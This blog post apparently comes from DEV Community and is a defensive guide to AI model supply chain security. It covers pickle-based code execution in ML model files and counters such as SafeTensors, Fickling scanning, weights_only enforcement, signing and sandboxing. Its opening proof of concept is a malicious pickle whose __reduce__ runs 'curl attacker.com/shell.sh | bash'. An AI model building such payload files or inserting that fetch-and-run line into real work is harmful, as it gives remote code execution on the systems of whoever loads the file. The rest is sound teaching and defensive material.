DEV Community

Young Gao

Securing the AI Model Supply Chain: A Practical Defense Guide for 2026

The AI model supply chain is under active attack. In the past 12 months, researchers have demonstrated remote code execution through malicious model files targeting PyTorch, TensorFlow, ONNX Runtime, and PaddlePaddle. As organizations rush to integrate AI, the model file has become the new attack vector — a modern trojan horse that bypasses traditional security controls.

This guide distills findings from hands-on security audits of major ML frameworks into actionable defenses you can implement today.

The Attack Surface: How Model Files Execute Code

Most ML frameworks serialize models using Python's pickle protocol. When you call torch.load() or paddle.load(), you're running an arbitrary code execution engine disguised as a data loader.

Here's a proof-of-concept that demonstrates the risk:

import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell.sh | bash",))

# This creates a valid .pkl file that executes on load
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Any framework using pickle.load() will execute the payload
# torch.load("model.pkl")  # RCE!

The __reduce__ method tells pickle how to reconstruct an object. Attackers abuse this to inject arbitrary function calls. The payload executes the moment the file is deserialized — no user interaction required.
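
You do not have to execute a pickle to see what it would do. As a quick illustration using only the standard library, pickletools disassembles the opcode stream statically, so the global reference to system() shows up without the payload ever running (the echo command here is a harmless stand-in for a real payload):

```python
import io
import pickle
import pickletools

# Same shape as the PoC above: __reduce__ smuggles a call to os.system
# into the pickle stream (echo is a harmless stand-in).
class MaliciousModel:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

payload = pickle.dumps(MaliciousModel())

# Disassemble the opcode stream WITHOUT executing it: the global
# reference to system() and the REDUCE call are plainly visible.
buf = io.StringIO()
pickletools.dis(payload, out=buf)
disassembly = buf.getvalue()
print("system call visible:", "system" in disassembly)
print("REDUCE opcode present:", "REDUCE" in disassembly)
```

This is essentially what scanners like Fickling build on: static analysis of the opcode stream, never deserialization.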

Real-World Attack Scenarios

1. Hugging Face Model Poisoning
An attacker uploads a backdoored model to a public hub. The model performs its intended task (text generation, image classification) while silently exfiltrating API keys from the environment.

2. Supply Chain Injection
A compromised CI/CD pipeline modifies model checkpoints during training. The poisoned weights include a pickle payload that activates only in production environments.

3. Fine-Tuning Trap
A "pre-trained" model offered for fine-tuning contains a payload that executes during the initial load, before any training begins.

Framework Security Audit: Who's Protected?

I audited the deserialization paths of six major frameworks. Here's what I found:

PyTorch: Improved but Still Risky

PyTorch 2.6+ defaults to weights_only=True in torch.load(), which blocks pickle-based attacks. But the migration is incomplete:

# SAFE: Modern PyTorch with weights_only (default since 2.6)
model = torch.load("model.pt")  # weights_only=True by default

# DANGEROUS: Legacy code or explicit override
model = torch.load("model.pt", weights_only=False)  # Full pickle!

# SAFE: the recommended format. Note that torch.save always writes
# pickle regardless of the file extension, so use the safetensors
# library to produce a real .safetensors file:
from safetensors.torch import save_file
save_file(model.state_dict(), "model.safetensors")

Key finding: vLLM (the popular LLM serving framework) consistently passes weights_only=True at all four of its torch.load call sites, a discipline worth copying in any serving stack.

PaddlePaddle: Whitelist Approach

PaddlePaddle implements a RestrictedUnpickler that only allows specific classes to be deserialized:

# PaddlePaddle's approach: explicit class whitelist
_ALLOWED_CLASSES = {
    'numpy': {'ndarray', 'dtype', 'float32', ...},
    'collections': {'OrderedDict', 'defaultdict'},
    'builtins': {'dict', 'list', 'tuple', 'set', ...},
    # ... only ~30 total classes allowed
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in _ALLOWED_CLASSES and name in _ALLOWED_CLASSES[module]:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"Forbidden: {module}.{name}")

Key finding: The main paddle.load() path is hardened, but distributed communication (serialization_utils.py) still uses unrestricted pickle.Unpickler — a potential attack vector in multi-node training setups.
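
The whitelist pattern is easy to reproduce end to end. Here is a self-contained sketch with a toy allow-list (illustrative, not PaddlePaddle's actual class list) showing the earlier payload being rejected before anything executes:

```python
import io
import pickle

# Toy allow-list for demonstration only; PaddlePaddle's real list is
# larger and covers numpy types as well.
ALLOWED = {"collections": {"OrderedDict"}, "builtins": {"dict", "list"}}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if name in ALLOWED.get(module, set()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"Forbidden: {module}.{name}")

class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

# The payload's global reference (posix.system / nt.system) is not on
# the allow-list, so find_class raises before any code runs.
blocked = False
try:
    RestrictedUnpickler(io.BytesIO(pickle.dumps(Evil()))).load()
except pickle.UnpicklingError:
    blocked = True
print("payload blocked:", blocked)
```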

SafeTensors: The Gold Standard

SafeTensors completely eliminates pickle. The format is a JSON header followed by raw tensor bytes, parsed in Rust with strict validation:

// SafeTensors validation (simplified from source)
fn validate(&self) -> Result<()> {
    let mut start = 0;
    for (name, info) in &self.tensors {
        // Contiguous offset check — no gaps, no overlaps
        if info.data_offsets.0 != start || info.data_offsets.1 < start {
            return Err(InvalidOffset(name));
        }
        // Checked arithmetic — no integer overflow
        let nelements = info.shape.iter()
            .try_fold(1usize, |acc, &x| acc.checked_mul(x))
            .ok_or(ValidationError)?;
        start = info.data_offsets.1;
    }
    Ok(())
}

Key finding: No code execution is possible. The Rust parser uses checked arithmetic to prevent integer overflows, validates contiguous offsets, and caps the header at 100MB. Python bindings are thin wrappers using numpy.frombuffer() — no deserialization at all.
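
To make the layout concrete, here is a pure-Python sketch of the container format and its contiguity check, simplified from the behavior described above (the real parser does more, including dtype-size and header-cap validation):

```python
import json
import struct

# Sketch of the safetensors container: an 8-byte little-endian header
# length, a JSON header mapping tensor names to
# {dtype, shape, data_offsets}, then the raw tensor bytes.
def write_safetensors_like(tensors: dict) -> bytes:
    header, blob, start = {}, b"", 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape,
                        "data_offsets": [start, start + len(raw)]}
        blob += raw
        start += len(raw)
    hjson = json.dumps(header).encode()
    return struct.pack("<Q", len(hjson)) + hjson + blob

def validate_offsets(payload: bytes) -> bool:
    # Mirror of the contiguity rule: each tensor must start exactly
    # where the previous one ended, with no gaps or overlaps.
    (hlen,) = struct.unpack_from("<Q", payload, 0)
    header = json.loads(payload[8:8 + hlen])
    start = 0
    for info in header.values():
        begin, end = info["data_offsets"]
        if begin != start or end < begin:
            return False
        start = end
    return start == len(payload) - 8 - hlen

blob = write_safetensors_like({
    "w": ("F32", [2, 2], bytes(16)),
    "b": ("F32", [2], bytes(8)),
})
print(validate_offsets(blob))  # True: contiguous layout passes

# A header claiming the first tensor starts at offset 4 leaves a gap
hjson = json.dumps({"w": {"dtype": "F32", "shape": [4],
                          "data_offsets": [4, 20]}}).encode()
bad = struct.pack("<Q", len(hjson)) + hjson + bytes(16)
print(validate_offsets(bad))  # False: gap detected
```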

Gradio: Defense in Depth

Gradio (the most popular ML demo framework) implements multiple layers of file security:

# Path traversal protection
def safe_join(directory, path):
    resolved = (Path(directory) / path).resolve()
    if not is_in_or_equal(resolved, Path(directory).resolve()):
        raise InvalidPathError()
    return resolved

# Proxy SSRF protection — only *.hf.space allowed
if not url.host.endswith(".hf.space"):
    raise PermissionError("Proxy restricted to HF Spaces")

Key finding: Well-hardened against path traversal and SSRF. Uses resolve() for symlink-safe checking and restricts proxy to Hugging Face domains only.
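
The same idea can be expressed with nothing but pathlib; the sketch below is illustrative rather than Gradio's actual implementation:

```python
from pathlib import Path
import tempfile

# Illustrative safe_join: resolve the candidate path, then require it
# to stay inside the base directory. resolve() follows symlinks, so
# both ../ tricks and symlink escapes land outside the base.
def safe_join(directory: str, path: str) -> Path:
    base = Path(directory).resolve()
    resolved = (base / path).resolve()
    if resolved != base and base not in resolved.parents:
        raise PermissionError(f"path escapes {base}: {path}")
    return resolved

root = tempfile.mkdtemp()
print(safe_join(root, "logo.png").name)  # inside the base: allowed

try:
    safe_join(root, "../../etc/passwd")
    escaped = True
except PermissionError:
    escaped = False
print("traversal blocked:", not escaped)
```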

Building Your Defense: A Practical Checklist

1. Migrate to SafeTensors

This is the single highest-impact action. SafeTensors eliminates the entire class of pickle-based attacks:

# Converting PyTorch models
from safetensors.torch import save_file, load_file

# Save
state_dict = model.state_dict()
save_file(state_dict, "model.safetensors")

# Load — no code execution possible
state_dict = load_file("model.safetensors")
model.load_state_dict(state_dict)

2. Scan Before You Load

Use Fickling to analyze pickle files before loading them:

# Install
pip install fickling

# Scan a model file for malicious operations
fickling --check-safety model.pkl

Integrate this into your CI/CD pipeline:

# .github/workflows/model-scan.yml
name: Model Security Scan
on:
  pull_request:
    paths: ['models/**']

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          lfs: true
      - run: pip install fickling
      - run: |
          shopt -s nullglob  # empty globs expand to nothing, not a literal pattern
          for f in models/*.pkl models/*.pt models/*.pth; do
            fickling --check-safety "$f"
          done

3. Enforce weights_only in PyTorch

Create a monkey-patch that prevents unsafe loads in your codebase:

# security/model_loading.py
import warnings

import torch

class SecurityWarning(UserWarning):
    """Warns when a caller opts into unsafe deserialization."""

_original_load = torch.load

def safe_load(*args, **kwargs):
    kwargs.setdefault("weights_only", True)
    if kwargs["weights_only"] is False:
        warnings.warn(
            "weights_only=False is a security risk. "
            "Use safetensors or ensure the file is trusted.",
            SecurityWarning, stacklevel=2,
        )
    return _original_load(*args, **kwargs)

torch.load = safe_load

4. Implement Model Signing

Sign your models to detect tampering:

import hashlib
import hmac
import json

def sign_model(model_path: str, secret_key: bytes) -> str:
    """Generate HMAC signature for a model file."""
    h = hmac.new(secret_key, digestmod=hashlib.sha256)
    with open(model_path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_model(model_path: str, signature: str, secret_key: bytes) -> bool:
    """Verify model file integrity before loading."""
    expected = sign_model(model_path, secret_key)
    return hmac.compare_digest(expected, signature)

# Usage in production. get_secret() and known_signature stand in for
# your secret manager and release metadata respectively.
MODEL_KEY = get_secret("MODEL_SIGNING_KEY")
if not verify_model("model.safetensors", known_signature, MODEL_KEY):
    raise RuntimeError("Model file has been tampered with!")

5. Network Isolation for Model Loading

Load untrusted models in a sandboxed environment:

# Dockerfile.model-sandbox
FROM python:3.12-slim
RUN pip install torch safetensors fickling

# No network access — prevents exfiltration
# Run with: docker run --network=none model-sandbox
COPY scan_and_convert.py /app/
WORKDIR /app
ENTRYPOINT ["python", "scan_and_convert.py"]
# scan_and_convert.py
import sys

import fickling
import torch
from safetensors.torch import save_file

model_path = sys.argv[1]

# Step 1: statically scan the pickle stream (no bytecode is executed)
if not fickling.is_likely_safe(model_path):
    print(f"UNSAFE: {model_path} failed fickling's safety analysis", file=sys.stderr)
    sys.exit(1)

# Step 2: load weights only, then convert to safetensors (sandboxed)
state_dict = torch.load(model_path, weights_only=True)
save_file(state_dict, model_path.replace(".pt", ".safetensors"))
print("Converted to safetensors successfully")

The Threat Landscape in 2026

| Threat | Likelihood | Impact | Mitigation |
| --- | --- | --- | --- |
| Pickle RCE in model files | High | Critical | SafeTensors migration |
| Poisoned public models | Medium | High | Model scanning + signing |
| Supply chain injection | Medium | Critical | CI/CD scanning + network isolation |
| Integer overflow in parsers | Low | High | Use SafeTensors (Rust + checked math) |
| Path traversal in serving | Low | Medium | Framework updates (Gradio 5+) |

Key Takeaways

  1. SafeTensors is non-negotiable for production deployments. It eliminates the entire attack class with zero performance penalty.

  2. Audit your torch.load calls — search your codebase for weights_only=False or missing weights_only parameter.

  3. Scan models in CI/CD — treat model files with the same suspicion as executable code, because they are.

  4. Sign and verify — model integrity should be cryptographically verified before loading in production.

  5. Sandbox untrusted models — load models from external sources in network-isolated containers.
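
Takeaway 2 can be automated with a few lines of stdlib code. The sketch below uses the ast module to flag torch.load calls that omit weights_only or disable it; the sample source string is purely illustrative, and in practice you would parse your own files:

```python
import ast

# Illustrative input; substitute the contents of your own modules.
SOURCE = """
import torch
a = torch.load("ok.pt")
b = torch.load("bad.pt", weights_only=False)
"""

def audit_torch_load(source: str) -> list[tuple[int, str]]:
    """Return (lineno, issue) pairs for risky torch.load calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr == "load"
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "torch"):
            kw = {k.arg: k.value for k in node.keywords}
            if "weights_only" not in kw:
                findings.append((node.lineno, "missing weights_only"))
            elif (isinstance(kw["weights_only"], ast.Constant)
                  and kw["weights_only"].value is False):
                findings.append((node.lineno, "weights_only=False"))
    return sorted(findings)

for lineno, issue in audit_torch_load(SOURCE):
    print(f"line {lineno}: {issue}")
```

Run as part of CI, this catches both legacy call sites and explicit opt-outs before they reach production.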

The AI model supply chain is where web application security was in 2010: the attacks are well-understood by researchers, but defenses are inconsistently deployed. Organizations that act now will avoid the breaches that are coming.


This analysis is based on hands-on security audits of PyTorch, PaddlePaddle, SafeTensors, Gradio, vLLM, and other major ML frameworks. All findings were responsibly disclosed.
